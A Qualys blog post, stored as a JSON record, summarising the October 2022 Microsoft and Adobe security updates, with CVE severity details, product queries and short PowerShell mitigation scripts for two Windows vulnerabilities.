DATABASE RESOURCES PRICING ABOUT US

{"id": "QUALYSBLOG:F062F85432853297A014064EA7A5C183", "vendorId": null, "type": "qualysblog", "bulletinFamily": "blog", "title": "October 2022 Patch Tuesday | Microsoft Releases 84 Vulnerabilities with 13 Critical, plus 12 Microsoft Edge (Chromium-Based); Adobe Releases 4 Advisories, 29 Vulnerabilities with 17 Critical.", "description": "* * *\n\n# **Microsoft Patch Tuesday Summary**\n\nMicrosoft has fixed 84 vulnerabilities (aka flaws) in the October 2022 update, including 13 vulnerabilities classified as **_Critical_** as they allow Elevation of Privilege (EoP), Remote Code Execution (RCE), and Spoofing. This month&#x27;s Patch Tuesday fixes two (2) zero-day vulnerabilities, with one (1) actively exploited***** in attacks ([CVE-2022-41033](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41033>)*****,[ ](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30134>)[CVE-2022-41043](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41043>)). Earlier this month, on October 3 and 6, 2022, Microsoft also released a total of 12 Microsoft Edge (Chromium-Based) updates, one (1) addressing Spoofing ([CVE-2022-41035](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41035>)) ranked _**Moderate**_.\n\nMicrosoft has fixed several flaws in its software, including Denial of Service (DoS), Elevation of Privilege (EoP), Information Disclosure, Remote Code Execution (RCE), Security Feature Bypass, Spoofing, Microsoft Edge (Chromium-based), and Microsoft Edge (Chromium-based) / Spoofing.\n\n# Microsoft Exchange _&quot;**ProxyNotShell&quot;**_** **Zero-Days Not Yet Addressed _(QID 50122)_\n\nUnfortunately, Microsoft has not released security updates to address **_ProxyNotShell_** which includes [two actively exploited zero-day vulnerabilities](<https://blog.qualys.com/vulnerabilities-threat-research/2022/09/30/qualys-response-to-proxynotshell-microsoft-exchange-server-zero-day-threat-using-qualys-platform>) tracked as [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) and [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>). \n\n[Released: October 2022 Exchange Server Security Updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-october-2022-exchange-server-security-updates/ba-p/3646263>) provides the following update:\n\n> **NOTE** The October 2022 SUs **_do not_** contain fixes for the zero-day vulnerabilities reported publicly on September 29, 2022 (CVE-2022-41040 and CVE-2022-41082). Please [see this blog post](<https://techcommunity.microsoft.com/t5/exchange-team-blog/customer-guidance-for-reported-zero-day-vulnerabilities-in/ba-p/3641494>) to apply mitigations for those vulnerabilities. We will release updates for CVE-2022-41040 and CVE-2022-41082 when they are ready.\n\n[Ankit Malhotra](<https://blog.qualys.com/author/amalhotra>), Manager, Signature Engineering suggests, &quot;It&#x27;s worth noting that Microsoft has had to revise the mitigation for [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) more than once, as the suggested URL rewrite Mitigation was bypassed multiple times. Organizations that reacted to the ProxyShell vulnerability should also pay close attention to this, taking their lessons learned on rapid remediation, as this vulnerability can potentially see increased exploitation.&quot;\n\n* * *\n\n[](<https://tinyl.io/79AH>)\n\n**[ProxyNotShell: Microsoft Exchange Server Zero-Day Threat Using Qualys VMDR](<https://tinyl.io/79AH>)** | [QUALYS ON-DEMAND WEBINAR](<https://tinyl.io/7A58>)\n\n[Watch Now](<https://tinyl.io/79AH>)\n\n[**Qualys Response to _ProxyNotShell_ Microsoft Exchange Server Zero-Day Threat Using Qualys Cloud Platform**](<https://tinyl.io/79AJ>) | [QUALYS BLOG](<https://blog.qualys.com/?>)\n\n* * *\n\n## **The October 2022 Microsoft Vulnerabilities are classified as follows:**\n\n[Microsoft Exploitability Index](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>) / [Microsoft Security Update Severity Rating System](<https://www.microsoft.com/en-us/msrc/security-update-severity-rating-system>)\n\n* * *\n\n## Two (2) **Zero-Day Vulnerabilities Addressed**\n\nA vulnerability is classified as a **_zero-day_** if it is publicly disclosed or actively exploited with no official fix available.\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41033>)[CVE-2022-41033](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41033>) | Windows COM+ Event System Service Elevation of Privilege (EoP) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.8/10.\n\nClassified as **_Critical_**, this issue affects an unknown function of the component COM+ Event System Service. The impact of exploitation is loss of confidentiality, integrity, and availability.\n\nMicrosoft has not disclosed how the vulnerability is being exploited or if it is being exploited in targeted or more widespread attacks. They only say that the attack complexity is low and that it requires no user interaction for the attacker to be able to achieve SYSTEM privileges.\n\nAn attacker who successfully exploited this vulnerability could gain SYSTEM privileges.\n\nPatch Installation should be considered **_Critical_**.\n\n[Saeed Abbasi](<https://blog.qualys.com/author/sabbasi>), Manager, Vulnerability Signatures adds, &quot;This patch fixes a security vulnerability that Microsoft stated is under active attack. However, it is not clear how severe these attacks are. Due to the nature of this vulnerability, a privilege escalation that often engages some social engineering (e.g. requiring the user to open a malicious attachment), history shows that it potentially needs to be chained with a code execution bug to exploit.&quot;\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Detected_**\n\n* * *\n\n### [CVE-2022-41043](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41043>)| Microsoft Office Information Disclosure Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 3.3/10.\n\nThe type of information that could be disclosed if an attacker successfully exploited this vulnerability is user tokens and other potentially sensitive information. The impact of exploitation is loss of confidentiality.\n\nThis vulnerability demands that the victim is doing some kind of user interaction. As of the time of publishing, neither technical details nor an exploit is publicly available.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): _**Exploitation Less Likely**_\n\n* * *\n\n## **Microsoft Critical Vulnerability Highlights**\n\n### **[](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37968>)[CVE-2022-37968](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37968>) |** Azure Arc-enabled Kubernetes cluster Connect Elevation of Privilege (EoP) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of** **10/10.\n\nMicrosoft has identified a vulnerability affecting the cluster connect feature of Azure Arc-enabled Kubernetes clusters. This vulnerability could allow an unauthenticated user to elevate their privileges and potentially gain administrative control over the Kubernetes cluster. Additionally, because Azure Stack Edge allows customers to deploy Kubernetes workloads on their devices via Azure Arc, Azure Stack Edge devices are also vulnerable to this vulnerability.\n\nCustomers using Azure Stack Edge must update to the 2209 release (software version 2.2.2088.5593). Release notes for the 2209 release of Azure Stack Edge can be found here: [Azure Stack Edge 2209 release notes](<https://learn.microsoft.com/en-us/azure/databox-online/azure-stack-edge-gpu-2209-release-notes>).\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-37976](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37976>)** |** Active Directory Certificate Services Elevation of Privilege (EoP) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of** **8.8/10.\n\nA malicious DCOM client could coerce a DCOM server to authenticate to it through the Active Directory Certificate Service (ADCS) and use the credential to launch a cross-protocol attack.\n\nAn attacker who successfully exploited this vulnerability could gain domain administrator privileges.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-41038](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41038>)** |** Microsoft SharePoint Server Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of** **8.8/10.\n\nIn a network-based attack, an authenticated attacker with Manage List permissions could execute code remotely on the SharePoint Server.\n\nThe attacker must be authenticated to the target site, with permission to use Manage Lists within SharePoint.\n\n**NOTE**: Customers running SharePoint Server 2013 Service Pack 1 can install the cumulative update or the security update, which is the same update as for Foundation Server 2013.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely_**\n\n* * *\n\n### [CVE-2022-38048](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38048>)** |** Microsoft Office Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of** **7.8/10.\n\nThe word **_Remote_** in the title refers to the location of the attacker. This type of exploit is sometimes referred to as Arbitrary Code Execution (ACE). The attack itself is carried out locally.\n\nWhen a particular vulnerability allows an attacker to execute &quot;arbitrary code&quot;, it typically means that the bad guy can run any command on the target system the attacker chooses. [_Source_](<https://tinyl.io/7A6M>)\n\nFor example, when the score indicates that the _Attack Vector_ is _Local_ and _User Interaction_ is _Required_, this could describe an exploit in which an attacker, through social engineering, convinces a victim to download and open a specially crafted file from a website which leads to a local attack on their computer. The impact of exploitation is loss of confidentiality, integrity, and availability.\n\n**NOTE**: Customers should apply all updates offered for the software installed on their systems. If multiple updates apply, they can be installed in any order.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely_**\n\n* * *\n\n### [CVE-2022-34689](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34689>)** |** Windows CryptoAPI Spoofing Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of** **7.5/10.\n\nAn attacker could manipulate an existing public x.509 certificate to spoof their identify and perform actions such as authentication or code signing as the targeted certificate.\n\nThe technical details are unknown, and an exploit is not publicly available. The impact is known to affect integrity.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely_**\n\n* * *\n\n## **Microsoft Release Summary**\n\nThis month\u2019s [Release Notes](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Oct>) cover multiple Microsoft product families, including Azure, Browser, Developer Tools, Extended Security Updates [(ESU)](<https://docs.microsoft.com/en-us/lifecycle/faq/extended-security-updates>), Microsoft Office, System Center, and Windows.\n\nA total of 78 unique Microsoft products/versions are affected, including but not limited to .NET and .NET Core, Azure Arc-enabled Kubernetes cluster, Azure Service Fabric Explorer, Azure Stack Edge, Azure StorSimple 8000 Series, Jupyter Extension for Visual Studio Code, Microsoft 365 Apps for Enterprise, Microsoft Edge (Chromium-based), Microsoft Malware Protection Engine, Microsoft Office, Microsoft SharePoint Enterprise Server, Microsoft SharePoint Foundation, Microsoft SharePoint Server, Microsoft Visual Studio, Visual Studio and Visual Studio Code, Windows Desktop, and Windows Server.\n\nDownloads include Cumulative Updates, Monthly Rollups, Security Only, and Security Updates.\n\n* * *\n\n## **Microsoft Edge | Last But Not Least**\n\nEarlier in October 2022, Microsoft released Microsoft Edge (Chromium-based) vulnerabilities including [CVE-2022-41035](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41035>). The vulnerability assigned to the CVE is in the Chromium Open Source Software (OSS) which is consumed by Microsoft Edge. It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable. For more information, please see [Security Update Guide Supports CVEs Assigned by Industry Partners](<https://msrc-blog.microsoft.com/2021/01/13/security-update-guide-supports-cves-assigned-by-industry-partners/>).\n\n### **[](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41035>)[CVE-2022-41035](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41035>)** **| Microsoft Edge (Chromium-based) Spoofing Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.3/10.\n\nIn a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) that contains a specially crafted file that is designed to exploit the vulnerability. However, an attacker would have no way to force the user to visit the website. Instead, an attacker would have to convince the user to click a link, typically by way of an enticement in an email or Instant Messenger message, and then convince the user to open the specially crafted file.\n\n[Per Microsoft severity guidelines](<https://www.microsoft.com/en-us/msrc/bounty-new-edge>), the amount of user interaction or preconditions required to allow this sort of exploitation downgraded the severity. The CVSS scoring system doesn&#x27;t allow for this type of nuance. **Severity: _Moderate_**\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n_Did you know? Microsoft Security Response Center (MSRC) | [Improvements in Security Update Notifications Delivery \u2013 And a New Delivery Method](<https://tinyl.io/7A6i>). _\n\n* * *\n\n# **Adobe Security Bulletins and Advisories**\n\nAdobe released four (4) [security bulletins and advisories](<https://helpx.adobe.com/security/security-bulletin.html>) with updates to fix 29 vulnerabilities affecting Adobe ColdFusion, Adobe Reader, Adobe Commerce, and Adobe Dimension applications. Of these 29 vulnerabilities, 17 are rated as **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, ten (10) are rated as Important and two (2) are rated as **_[Moderate](<https://helpx.adobe.com/security/severity-ratings.html>)_**; ranging in severity from a CVSS score of 4.4/10 to 10/10, as summarized below.\n\n\n\n* * *\n\n### [APSB22-42](<https://helpx.adobe.com/security/products/coldfusion/apsb22-44.html>)** | **Security updates available for Adobe ColdFusion\n\nThis update resolves six (6) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, six (6) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>), _**and one (1) **_[Moderate](<https://helpx.adobe.com/security/severity-ratings.html>)_** vulnerability.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released security updates for ColdFusion versions 2021 and 2018. These updates resolve [Critical](<https://helpx.adobe.com/security/severity-ratings.html>), [Important](<https://helpx.adobe.com/security/severity-ratings.html>), and [Moderate](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities that could lead to arbitrary code execution, arbitrary file system write, security feature bypass, and privilege escalation.\n\n* * *\n\n### [APSB22-46](<https://helpx.adobe.com/security/products/acrobat/apsb22-46.html>)** | **Security update available for Adobe Acrobat and Reader\n\nThis update resolves two (2) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, and two (2) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_** vulnerabilities.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to application denial-of-service and memory leak.\n\n* * *\n\n### [APSB22-48](<https://helpx.adobe.com/security/products/magento/apsb22-48.html>)** | **Security update available for Adobe Commerce\n\nThis update resolves two (2) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, and two (2) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_** vulnerabilities.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for Adobe Commerce and Magento Open Source. This update resolves a [critical](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerability. Successful exploitation could lead to arbitrary code execution. \n\n* * *\n\n### [APSB22-57](<https://helpx.adobe.com/security/products/dimension/apsb22-57.html>)** | **Security updates available for Adobe Dimension\n\nThis update resolves eight (8) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, and one (1) **_[Moderate](<https://helpx.adobe.com/security/severity-ratings.html>)_** vulnerability.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Adobe Dimension. This update addresses [critical ](<https://helpx.adobe.com/security/severity-ratings.html>)and [moderate](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leak in the context of the current user. \n\n* * *\n\n# **About Qualys Patch Tuesday**\n\nQualys Patch Tuesday QIDs are published as [Security Alerts](<https://www.qualys.com/research/security-alerts/>) typically late in the evening on the day of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed later by the publication of the monthly queries for the [Unified Dashboard: 2022 Patch Tuesday (QID Based) Dashboard](<https://success.qualys.com/discussions/s/article/000006821>) by Noon on Wednesday.\n\n* * *\n\n## Qualys Threat Research Blog Posts **_New_**\n\nPublished in the Last 30 days; Most Recent First\n\n * [NSA Alert: Topmost CVEs Actively Exploited By People\u2019s Republic of China State-Sponsored Cyber Actors](<https://tinyl.io/79AX>)\n * [Qualys Response to ProxyNotShell Microsoft Exchange Server Zero-Day Threat Using Qualys Cloud Platform](<https://tinyl.io/79Aa>)\n\n* * *\n\n## **Qualys [Threat Protection](<https://www.qualys.com/apps/threat-protection/>) High-Rated Advisories**\n\nPublished between September 14 - October 12, 2022, Most Recent First\n\n * [Microsoft Patch Tuesday, October 2022 Edition: 84 Vulnerabilities patched including 12 Microsoft Edge (Chromium-Based), 2 Zero-days, and 13 Rated as Critical](<https://tinyl.io/79Vx>)\n * [Zimbra Collaboration Suite Remote Code Execution Vulnerability (CVE-2022-41352)](<https://tinyl.io/797N>)\n * [FortiGate and FortiProxy Authentication Bypass Vulnerability on Administrative Interface (HTTP/HTTPS) (CVE-2022-40684)](<https://tinyl.io/797M>)\n * [Microsoft Exchange Server Zero-day Vulnerabilities (CVE-2022-41040 and CVE-2022-41082) (ProxyNotShell)](<https://tinyl.io/797L>)\n * [Sophos Firewall Remote Code Execution Vulnerability (CVE-2022-3236)](<https://tinyl.io/797K>)\n * [Zoho ManageEngine PAM360, Access Manager Plus, and Password Manager Pro Remote Code Execution Vulnerability (CVE-2022-35405)](<https://tinyl.io/797J>)\n * [Trend Micro Patches Multiple Vulnerabilities in Apex One (On-Premise) Including One Zero-day (CVE-2022-40139)](<https://tinyl.io/797I>)\n * [Cisco Patched Multiple Vulnerabilities in Multiple Products including NVIDIA Data Plane Development Kit](<https://tinyl.io/797H>)\n * [Apple Patches Multiple Vulnerabilities in macOS Big Sur and macOS Monterey including One Zero-day (CVE-2022-32894)](<https://tinyl.io/797G>)\n * [Microsoft Patches Vulnerabilities 79 including 16 Microsoft Edge (Chromium-Based); with 2 Zero-days and 5 Critical in Patch Tuesday, September 2022 Edition](<https://threatprotect.qualys.com/2022/09/14/microsoft-patches-vulnerabilities-79-including-16-microsoft-edge-chromium-based-with-2-zero-days-and-5-critical-in-patch-tuesday-september-2022-edition/>)\n\n* * *\n\n# **Discover and Prioritize Vulnerabilities in **[Vulnerability Management Detection Response](<https://www.qualys.com/apps/vulnerability-management-detection-response/>)** **(VMDR)\n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its KnowledgeBase (KB). \n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n \n \n vulnerabilities.vulnerability:( qid:`91949` OR qid:`91950` OR qid:`91951` OR qid:`91953` OR qid:`110417` OR qid:`110418` OR qid:`377627` OR qid:`377628` ) \n\n\n\n [In-Depth Look Into Data-Driven Science Behind Qualys TruRisk](<https://blog.qualys.com/vulnerabilities-threat-research/2022/10/10/in-depth-look-into-data-driven-science-behind-qualys-trurisk>) **_New_**\n\n [Qualys VMDR Recognized as Best VM Solution by SC Awards 2022 &amp; Leader by GigaOm](<https://blog.qualys.com/product-tech/2022/08/22/qualys-vmdr-recognized-as-best-vm-solution-by-sc-awards-2022-leader-by-gigaom>)\n\n [A Deep Dive into VMDR 2.0 with Qualys TruRisk\u2122](<https://blog.qualys.com/product-tech/2022/08/08/a-deep-dive-into-vmdr-2-0-with-qualys-trurisk>)\n\n* * *\n\n# **Rapid Response with **[Patch Management](<https://www.qualys.com/apps/patch-management/>) (PM)\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches with one click.\n\nThe following QQL will return the missing patches for this Patch Tuesday:\n \n \n ( qid:`91949` OR qid:`91950` OR qid:`91951` OR qid:`91953` OR qid:`110417` OR qid:`110418` OR qid:`377627` OR qid:`377628` )\n\n\n\n [Why Organizations Struggle with Patch Management (and What to Do about It)](<https://tinyl.io/79TY>) **_New_**\n\n [Let Smart Automation Reduce the Risk of Zero-Day Attacks on Third-Party Applications](<https://blog.qualys.com/qualys-insights/2022/09/08/let-smart-automation-reduce-the-risk-of-zero-day-attacks-on-third-party-applications-2>)\n\n [Risk-based Remediation Powered by Patch Management in Qualys VMDR 2.0](<https://blog.qualys.com/product-tech/2022/06/22/risk-based-remediation-powered-by-patch-management-in-qualys-vmdr-2-0>)\n\n* * *\n\n# EXECUTE Mitigation Using [Custom Assessment and Remediation](<https://tinyl.io/79UY>) (CAR) **_New_**\n\n[Qualys Custom Assessment and Remediation](<https://www.qualys.com/apps/custom-assessment-remediation/>) empowers a system administrator to quickly and easily perform configuration updates on your technology infrastructure when the current situation requires the implementation of a vendor-suggested mitigation or workaround. \n\n**_Mitigation_** refers to a setting, common configuration, or general best practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability.\n\nA **_workaround_** is a method, sometimes used temporarily, for achieving a task or goal when the usual or planned method isn&#x27;t working. Information technology often uses a workaround to overcome hardware, programming, or communication problems. Once a problem is fixed, a workaround is usually abandoned. [_Source_](<https://www.techtarget.com/whatis/definition/workaround>)\n\n## Try It for Free!\n\n[Sign up now for a no-cost trial of Qualys Custom Assessment and Remediation](<https://www.qualys.com/forms/custom-assessment-remediation/>)\n\nCustomers can perform the provided mitigation steps by creating a PowerShell script and executing the script on vulnerable assets.\n\n**IMPORTANT: ** Scripts tend to change over time. Referring back to a portion of our quote from [Ankit Malhotra](<https://blog.qualys.com/author/amalhotra>) at the top of this blog, &quot;It&#x27;s worth noting that Microsoft has had to revise the mitigation for [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) more than once, as the suggested URL rewrite Mitigation was bypassed multiple times.&quot; **_Please refer to the Qualys GitHub Tuesday Patch [link](<https://github.com/Qualys/Custom-Assessment-and-Remediation-Script-Library/tree/main/Tuesday%20Patch>) to ensure the most current version of a given [Patch Tuesday script](<https://github.com/Qualys/Custom-Assessment-and-Remediation-Script-Library/tree/main/Tuesday%20Patch>) is in use._**\n\n### Related Blog Content:\n\nPublished in the Last 30 days; Most Recent First\n\n [Zimbra Collaboration Suite Remote Code Execution Vulnerability (CVE-2022-41352)](<https://tinyl.io/797N>)\n\n [Remediate Your Vulnerable Lenovo Systems with Qualys Custom Assessment and Remediation](<https://tinyl.io/79Y9>)\n\n### [**CVE-2022-37976**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37976>)** | **Active Directory Certificate Services Elevation of Privilege (EoP) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n[**GitHub Link for CVE-2022-37976 Script**](<https://github.com/Qualys/Custom-Assessment-and-Remediation-Script-Library/tree/main/Tuesday%20Patch/2022/October/CVE-2022-37976\\(ADCS%20Vulnerability\\)>)\n \n \n $ServiceName = \"CertSvc\"\n $ServiceStatus = (Get-Service -Name $ServiceName).status\n if($ServiceStatus -eq \"Running\")\n {\n \n reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Ole\\\" /v LegacyAuthenticationLevel /t REG_DWORD /d '5' /f | Out-Null\n \n if($?)\n {\n Write-Host \"ADCS found running. LegacyAuthenticationLevel is set to 5. Mitigation for CVE-2022-37976 has been applied as per MSRC guidelines. \"\n }\n else\n {\n Write-Host \"command failed\"\n }\n \n \n }\n else {\n Write-Host \"ADCS not running. No action required\"\n }\n\n\n\n* * *\n\n### [CVE-2022-33645](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33645>)** | **Windows TCP/IP Driver Denial of Service (DoS) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.5/10.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n[**GitHub Link for CVE-2022-33645 Script**](<https://github.com/Qualys/Custom-Assessment-and-Remediation-Script-Library/tree/main/Tuesday%20Patch/2022/October/CVE-2022-33645\\(TCPIP%20Driver%20Dos%20Vulnerability\\)>)\n \n \n Disable-NetAdapterBinding -Name \"*\" -ComponentID \"ms_tcpip6\"\n \n if($?)\n {\n Write-Host \"IPV6 has been disabled as part of workaround implementation. CVE-2022-33645 is now mitigated,\"\n }\n else\n {\n Write-Host \"command failed\"\n }\n \n\n\n\n* * *\n\n# **EVALUATE Vendor-Suggested Mitigation with **[**Policy Compliance**](<https://www.qualys.com/forms/policy-compliance/>) (PC)\n\n[Qualys Policy Compliance Control Library](<https://vimeo.com/700790353>) makes it easy to evaluate your technology infrastructure when the current situation requires implementation validation of a vendor-suggested mitigation or workaround. \n\n**_Mitigation_** refers to a setting, common configuration, or general best practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability.\n\nA **_workaround_** is a method, sometimes used temporarily, for achieving a task or goal when the usual or planned method isn&#x27;t working. Information technology often uses a workaround to overcome hardware, programming, or communication problems. Once a problem is fixed, a workaround is usually abandoned. [_Source_](<https://www.techtarget.com/whatis/definition/workaround>)\n\nThe following [Qualys Policy Compliance Control IDs (CIDs), and System Defined Controls (SDC) ](<https://qualysguard.qg2.apps.qualys.com/qwebhelp/fo_portal/module_pc/controls/controls_lp.htm>)have been updated to support Microsoft recommended mitigation(s) for this Patch Tuesday:\n\n### [**CVE-2022-37976**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37976>)** | **Active Directory Certificate Services Elevation of Privilege (EoP) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * **4079 **Status of the &#x27;Active Directory Certificate Service&#x27; ** **\n * **14916 **Status of Windows Services** **\n * **24842** Status of the &#x27;LegacyAuthenticationLevel&#x27; setting\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-33645](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33645>)** | **Windows TCP/IP Driver Denial of Service (DoS) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.5/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * **4842** Status of the &#x27;Internet Protocol version 6 (IPv6) components&#x27; setting\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\nThe following QQL will return a posture assessment for the CIDs for this Patch Tuesday:\n \n \n control:( id:`4079` OR id:`4842` OR id:`14916` OR id:`24842` ) \n\n\n\n [Prepare Your Organization for Compliance with the NYDFS Cybersecurity Regulation](<https://tinyl.io/79U7>) **_New_**\n\n [Mitigating the Risk of Zero-Day Vulnerabilities by using Compensating Controls](<https://blog.qualys.com/vulnerabilities-threat-research/2022/08/23/mitigating-the-risk-of-zero-day-vulnerabilities-by-using-compensating-controls>)\n\n [Policy Compliance (PC) | Policy Library Update Blogs](<https://notifications.qualys.com/tag/policy-library>)\n\n* * *\n\n**Patch Tuesday is Complete.**\n\n* * *\n\n# [This Month in Vulnerabilities and Patches](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>) Webinar Series \n\n[](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>)\n\n[Subscribe Now](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>)\n\nThe Qualys Product Management and Threat Research team members host a monthly webinar series to help our existing customers leverage the seamless integration between [Qualys Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) and [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>). Combining these two solutions can reduce the median time to remediate critical vulnerabilities. \n\nDuring the webcast, this month\u2019s Patch Tuesday high-impact vulnerabilities will be discussed. We will walk you through the necessary steps to address the key vulnerabilities using Qualys VMDR and Qualys Patch Management.\n\n* * *\n\n# UPCOMING EVENTS\n\n* * *\n\nThe content within this section will spotlight upcoming Vulnerability Management, Patch Management, Threat Protection, Custom Assessment and Remediation, and Policy Compliance adjacent events available to our prospective, new, and existing customers.\n\n## [**WEBINARS**](<https://gateway.on24.com/wcc/eh/3347108/category/91385/upcoming-webinars>)\n\n## Introducing Qualys Workshop Wednesday\n\n[](<https://gateway.on24.com/wcc/eh/3347108/category/111238/workshop-wednesday>)\n\nAt Qualys Inc, providing cybersecurity through technology is what we do. Join us each month as we tap into the minds of Qualys experts to share how you can get the most out of your investment and understand ways in which you can quickly reduce your cyber risk exposure using the Qualys Cloud Platform. Each 45-minute monthly session, hosted on the first Wednesday of the month, will showcase practical hands-on tips and tricks, news on new capabilities and services, as well as useful customer success stories that can help you get the most out of the Qualys Cloud Platform. \n\n**Join us for the first Workshop Wednesday on Nov 2, 2022, at 9:00 AM PDT. **\n\n[Subscribe Now](<https://gateway.on24.com/wcc/eh/3347108/category/111238/workshop-wednesday>)\n\n* * *\n\n## Qualys Threat Thursdays\n\n[](<https://gateway.on24.com/wcc/eh/3347108/category/111445/threat-thursday>)\n\n[Subscribe Now](<https://gateway.on24.com/wcc/eh/3347108/category/111445/threat-thursday>)\n\nThe Qualys Threat Research team invites you to join their regular monthly webinar series covering the latest threat intelligence analysis and insight. \n\nOctober 2022 Threat Thursday Topic is **AsyncRAT**.\n\nNever miss an update. [Subscribe Today](<https://gateway.on24.com/wcc/eh/3347108/category/111445/threat-thursday>)!\n\n[Click Here](<https://tinyl.io/79BC>) to quickly navigate to Qualys Threat Thursday blog posts.\n\n* * *\n\n## 